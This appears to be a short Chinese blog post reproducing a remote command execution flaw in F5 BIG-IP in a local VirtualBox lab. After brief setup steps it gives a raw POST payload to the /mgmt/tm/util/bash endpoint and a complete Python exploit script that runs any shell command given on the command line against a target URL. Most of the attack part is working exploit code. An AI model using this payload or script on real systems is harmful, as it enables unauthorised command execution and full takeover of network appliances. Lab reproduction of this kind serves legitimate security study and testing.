安装f5 BIG-IP,fq点击下载
然后双击.ova或者导入VirtualBox中打开虚拟机,设置一个强密码
诶嘿~ 。。我的安好了,特别小,可能是我屏幕分辨率太高的原因,也不太会用这个box
依次输入
root
default
default
123!@#qwe (随便设置一个强口令,否则无法通过)
获得IP,因为我的屏幕太小,所以用的ifconfig|more一行一行倒的
目标地址:https://192.168.0.107,尝试使用 admin/刚才设置的强口令进行登录,第一次登录让修改密码,照做便是。
Payload
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.0.107
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.0
Authorization: Basic YWRtaW46c3YzbmJlYXN0
X-F5-Auth-Token:
Content-Length: 42
Content-Type: application/json
{"utilCmdArgs": "-c id", "command": "run"}
Exp
import requests,sys,json
from requests.auth import HTTPBasicAuth
requests.packages.urllib3.disable_warnings()
banner = '''
__ _____ ______ _____ _____ ___________
/ _| ___| | ___ \_ _| __ \ |_ _| ___ \\
| |_|___ \ | |_/ / | | | | \/_____| | | |_/ /
| _| \ \ | ___ \ | | | | _|______| | | __/
| | /\__/ / | |_/ /_| |_| |_\ \ _| |_| |
|_| \____/ \____/ \___/ \____/ \___/\_|
by 斯文
'''
def exp(url,cmd):
try:
session = requests.Session()
rawBody = "{{\"utilCmdArgs\": \"-c {}\", \"command\": \"run\"}}".format(cmd)
headers = {"Accept":"*/*","Connection":"close","User-Agent":"python-requests/2.25.0","Accept-Encoding":"gzip, deflate","X-F5-Auth-Token":"","Content-Type":"application/json"}
response = session.post("{}/mgmt/tm/util/bash".format(url), data=rawBody,headers=headers, verify=False,auth=HTTPBasicAuth("admin","test"))
result = json.loads(response.content)
print(">url: {}".format(url))
print(">command: {}".format(cmd))
print(">result: \n\n{}".format(result['commandResult']))
except Exception as e:
# print(e)
print("Not vul")
if __name__ == "__main__":
print(banner)
exp(sys.argv[1],sys.argv[2])
支付宝 
微信